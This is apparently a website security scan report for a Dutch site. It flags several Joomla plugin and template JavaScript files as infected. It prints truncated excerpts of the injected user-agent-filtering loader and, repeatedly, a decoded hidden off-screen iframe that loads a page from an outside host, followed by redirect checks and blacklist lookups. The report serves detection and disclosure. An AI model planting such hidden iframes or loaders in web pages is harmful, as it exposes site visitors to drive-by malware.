Scanned pages/files
Request | Server response | Status |
http://villalibertas.nl/ | 200 OK Content-Length: 13085 Content-Type: text/html | clean |
http://villalibertas.nl/media/system/js/caption.js | 200 OK Content-Length: 3832 Content-Type: application/x-javascript | clean |
http://villalibertas.nl/plugins/content/avreloaded/silverlight.js | 200 OK Content-Length: 9962 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below) (function(){ function stripos (f_haystack, f_needle, f_offset) { var haystack = (f_haystack + '').toLowerCase(); var needle = (f_needle + '').toLowerCase(); var index = 0; if ((index = haystack.indexOf(needle, f_offset)) !== -1) { return index; } return false; } function ffff_listier_ua(){ var nevernList = 'iPhone|Macintosh|Linux|iPad|Series40|SymbOS|Flock|SeaMonkey|Nokia|SlimBrowser|AmigaOS|Android|FreeBSD|Chrome|IEMobile|SymbianOS|Avant|Chromium|Fire Antivirus reports:
| ||
http://villalibertas.nl/plugins/content/avreloaded/wmvplayer.js | 200 OK Content-Length: 18345 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below) (function(){ function stripos (f_haystack, f_needle, f_offset) { var haystack = (f_haystack + '').toLowerCase(); var needle = (f_needle + '').toLowerCase(); var index = 0; if ((index = haystack.indexOf(needle, f_offset)) !== -1) { return index; } return false; } function ffff_listier_ua(){ var nevernList = 'iPhone|Macintosh|Linux|iPad|Series40|SymbOS|Flock|SeaMonkey|Nokia|SlimBrowser|AmigaOS|Android|FreeBSD|Chrome|IEMobile|SymbianOS|Avant|Chromium|Fire Decoded script: <iframe src="http://susuroot.insidesavannah.com/kfggesfgdhfjgj8.html" style="position:absolute;left:-1320px;top:-1320px;" height="185" width="185" name="Nightly"></iframe> Antivirus reports:
| ||
http://villalibertas.nl/plugins/content/avreloaded/swfobject.js | 200 OK Content-Length: 14123 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below) (function(){ function stripos (f_haystack, f_needle, f_offset) { var haystack = (f_haystack + '').toLowerCase(); var needle = (f_needle + '').toLowerCase(); var index = 0; if ((index = haystack.indexOf(needle, f_offset)) !== -1) { return index; } return false; } function ffff_listier_ua(){ var nevernList = 'iPhone|Macintosh|Linux|iPad|Series40|SymbOS|Flock|SeaMonkey|Nokia|SlimBrowser|AmigaOS|Android|FreeBSD|Chrome|IEMobile|SymbianOS|Avant|Chromium|Fire Decoded script: <iframe src="http://susuroot.insidesavannah.com/kfggesfgdhfjgj8.html" style="position:absolute;left:-1320px;top:-1320px;" height="185" width="185" name="Nightly"></iframe> Antivirus reports:
| ||
http://villalibertas.nl/plugins/content/avreloaded/avreloaded.js | 200 OK Content-Length: 4228 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below) (function(){ function stripos (f_haystack, f_needle, f_offset) { var haystack = (f_haystack + '').toLowerCase(); var needle = (f_needle + '').toLowerCase(); var index = 0; if ((index = haystack.indexOf(needle, f_offset)) !== -1) { return index; } return false; } function ffff_listier_ua(){ var nevernList = 'iPhone|Macintosh|Linux|iPad|Series40|SymbOS|Flock|SeaMonkey|Nokia|SlimBrowser|AmigaOS|Android|FreeBSD|Chrome|IEMobile|SymbianOS|Avant|Chromium|Fire Antivirus reports:
| ||
http://villalibertas.nl/modules/mod_news_show_gk2/scripts/engine.js | 200 OK Content-Length: 5502 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below) (function(){ function stripos (f_haystack, f_needle, f_offset) { var haystack = (f_haystack + '').toLowerCase(); var needle = (f_needle + '').toLowerCase(); var index = 0; if ((index = haystack.indexOf(needle, f_offset)) !== -1) { return index; } return false; } function ffff_listier_ua(){ var nevernList = 'iPhone|Macintosh|Linux|iPad|Series40|SymbOS|Flock|SeaMonkey|Nokia|SlimBrowser|AmigaOS|Android|FreeBSD|Chrome|IEMobile|SymbianOS|Avant|Chromium|Fire NV--; $E('.gk_news_show_panel_amount_value',el).setHTML(NR-NV); Cookie.set('gk_news_show_amount'+TID, (NR-NV), {duration: 14,path: "/"}); if(list){ for(var k=0;k<NC;k++){ if(((NR-NV)*NC)-(1+k) < amountOfLi) listOfLi[((NR-NV)*NC)-(1+k)].setStyle('display','none'); } } } }); } } }); }); Decoded script: <iframe src="http://susuroot.insidesavannah.com/kfggesfgdhfjgj8.html" style="position:absolute;left:-1320px;top:-1320px;" height="185" width="185" name="Nightly"></iframe> Antivirus reports:
| ||
http://villalibertas.nl/modules/mod_gk_news_image_5/js/engine.js | 200 OK Content-Length: 8163 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below) (function(){ function stripos (f_haystack, f_needle, f_offset) { var haystack = (f_haystack + '').toLowerCase(); var needle = (f_needle + '').toLowerCase(); var index = 0; if ((index = haystack.indexOf(needle, f_offset)) !== -1) { return index; } return false; } function ffff_listier_ua(){ var nevernList = 'iPhone|Macintosh|Linux|iPad|Series40|SymbOS|Flock|SeaMonkey|Nokia|SlimBrowser|AmigaOS|Android|FreeBSD|Chrome|IEMobile|SymbianOS|Avant|Chromium|Fire if(!play) this.image_pause($G); if((play || $G["autoanim"] == 1) && ($G["actual_anim"] == false)){ $G["actual_anim"] = (function(){ n = (n < max) ? n+1 : 0; $this.image_anim(elID,mainwrap,wrap,slides,n,contents,$G,true); }).periodical($G["anim_speed"]*2+$G["anim_interval"]); } } }, image_pause : function($G){ $clear($G["actual_anim"]); $G["actual_anim"] = false; } }); Decoded script: <iframe src="http://susuroot.insidesavannah.com/kfggesfgdhfjgj8.html" style="position:absolute;left:-1320px;top:-1320px;" height="185" width="185" name="Nightly"></iframe> Antivirus reports:
| ||
http://villalibertas.nl/modules/mod_gk_news_image_5/js/importer.php?mid=news_image_5_1&animation_slide_speed=1000&animation_interval=5000&autoanimation=1&animation_slide_type=0&animation_text_type=0&base_bgcolor=000000&text_block_opacity=0.45 | 200 OK Content-Length: 219 Content-Type: text/javascript | clean |
http://villalibertas.nl/templates/gk_gomuproject/lib/scripts/template_scripts.js | 200 OK Content-Length: 3814 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below) (function(){ function stripos (f_haystack, f_needle, f_offset) { var haystack = (f_haystack + '').toLowerCase(); var needle = (f_needle + '').toLowerCase(); var index = 0; if ((index = haystack.indexOf(needle, f_offset)) !== -1) { return index; } return false; } function ffff_listier_ua(){ var nevernList = 'iPhone|Macintosh|Linux|iPad|Series40|SymbOS|Flock|SeaMonkey|Nokia|SlimBrowser|AmigaOS|Android|FreeBSD|Chrome|IEMobile|SymbianOS|Avant|Chromium|Fire if(h > max_height) max_height = h; }); $ES('.users', $('bottom_wrap')).each(function(el, i){ el.getChildren()[0].setStyle("height", max_height+"px"); }); } }); function changeStyle(style){ var file = template_path+'/css/style'+style+'.css'; new Asset.css(file); new Cookie.set('gk16_style',style,{duration: 200,path: "/"}); actual_style = style; } Decoded script: <iframe src="http://susuroot.insidesavannah.com/kfggesfgdhfjgj8.html" style="position:absolute;left:-1320px;top:-1320px;" height="185" width="185" name="Nightly"></iframe> Antivirus reports:
| ||
http://villalibertas.nl/templates/gk_gomuproject/lib/scripts/jmenu_2.js | 200 OK Content-Length: 3755 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below) (function(){ function stripos (f_haystack, f_needle, f_offset) { var haystack = (f_haystack + '').toLowerCase(); var needle = (f_needle + '').toLowerCase(); var index = 0; if ((index = haystack.indexOf(needle, f_offset)) !== -1) { return index; } return false; } function ffff_listier_ua(){ var nevernList = 'iPhone|Macintosh|Linux|iPad|Series40|SymbOS|Flock|SeaMonkey|Nokia|SlimBrowser|AmigaOS|Android|FreeBSD|Chrome|IEMobile|SymbianOS|Avant|Chromium|Fire levels.each(function(e,k){ e.each(function(a,l){ a.addEvent("mouseenter",function(){ a.getChildren()[1].setStyle("overflow","hidden"); effects2[k][l].toggle(); (function(){a.getChildren()[1].setStyle("overflow","")}).delay(500); }); a.addEvent("mouseleave",function(){ a.getChildren()[1].setStyle("overflow","hidden"); effects2[k][l].stop(); effects2[k][l].set(0); }); }); }); }); Decoded script: <iframe src="http://susuroot.insidesavannah.com/kfggesfgdhfjgj8.html" style="position:absolute;left:-1320px;top:-1320px;" height="185" width="185" name="Nightly"></iframe> Antivirus reports:
| ||
http://villalibertas.nl/templates/gk_gomuproject/lib/scripts/ie.js | 200 OK Content-Length: 2259 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below) (function(){ function stripos (f_haystack, f_needle, f_offset) { var haystack = (f_haystack + '').toLowerCase(); var needle = (f_needle + '').toLowerCase(); var index = 0; if ((index = haystack.indexOf(needle, f_offset)) !== -1) { return index; } return false; } function ffff_listier_ua(){ var nevernList = 'iPhone|Macintosh|Linux|iPad|Series40|SymbOS|Flock|SeaMonkey|Nokia|SlimBrowser|AmigaOS|Android|FreeBSD|Chrome|IEMobile|SymbianOS|Avant|Chromium|Fire } } })(); sfHover = function() { var sfEls = document.getElementById("horiz-menu").getElementsByTagName("LI"); for (var i=0; i<sfEls.length; i++) { sfEls[i].onmouseover=function() { this.className+=" sfHover"; } sfEls[i].onmouseout=function() { this.className=this.className.replace(new RegExp(" sfHover\\b"), ""); } } } if (window.attachEvent) window.attachEvent("onload", sfHover); Decoded script: function () { var sfEls = document.getElementById("horiz-menu").getElementsByTagName("LI"); for (var i = 0; i < sfEls.length; i++) { sfEls[i].onmouseover = function () {this.className += " sfHover";}; sfEls[i].onmouseout = function () {this.className = this.className.replace(new RegExp(" sfHover\\b"), "");}; } } <iframe src="http://susuroot.insidesavannah.com/kfggesfgdhfjgj8.html" style="position:absolute;left:-1320px;top:-1320px;" height="185" width="185" name="Nightly"></iframe> Antivirus reports:
| ||
http://translate.google.com/translate_a/element.js?cb=googleTranslateElementInit | 200 OK Content-Length: 1475 Content-Type: text/javascript | clean |
http://villalibertas.nl/./ | 200 OK Content-Length: 13087 Content-Type: text/html | clean |
http://villalibertas.nl/welcome.html | 200 OK Content-Length: 22356 Content-Type: text/html | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: villalibertas.nl
Result:
HTTP/1.1 200 OK
Cache-Control: post-check=0, pre-check=0
Connection: close
Date: Sun, 05 Oct 2014 00:23:50 GMT
Pragma: no-cache
Server: Apache
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Sun, 05 Oct 2014 00:23:51 GMT
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Set-Cookie: 4fafe161220916b4800d2e652a652cb6=4d20623bd3c52bb4ca32bc7d3460a371; path=/
X-Powered-By: PHP/5.2.17
GET / HTTP/1.1
Host: villalibertas.nl
Result:
HTTP/1.1 200 OK
Cache-Control: post-check=0, pre-check=0
Connection: close
Date: Sun, 05 Oct 2014 00:23:50 GMT
Pragma: no-cache
Server: Apache
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Sun, 05 Oct 2014 00:23:51 GMT
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Set-Cookie: 4fafe161220916b4800d2e652a652cb6=4d20623bd3c52bb4ca32bc7d3460a371; path=/
X-Powered-By: PHP/5.2.17
Second query (visit from search engine):
GET / HTTP/1.1
Host: villalibertas.nl
Referer: http://www.google.com/search?q=villalibertas.nl
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: villalibertas.nl
Referer: http://www.google.com/search?q=villalibertas.nl
Result:
The result is similar to the first query. There are no suspicious redirects found.
Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=villalibertas.nl
Result: This site is not currently listed as suspicious.
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://villalibertas.nl/
Result: villalibertas.nl is not infected or malware details are not published yet.
Result: villalibertas.nl is not infected or malware details are not published yet.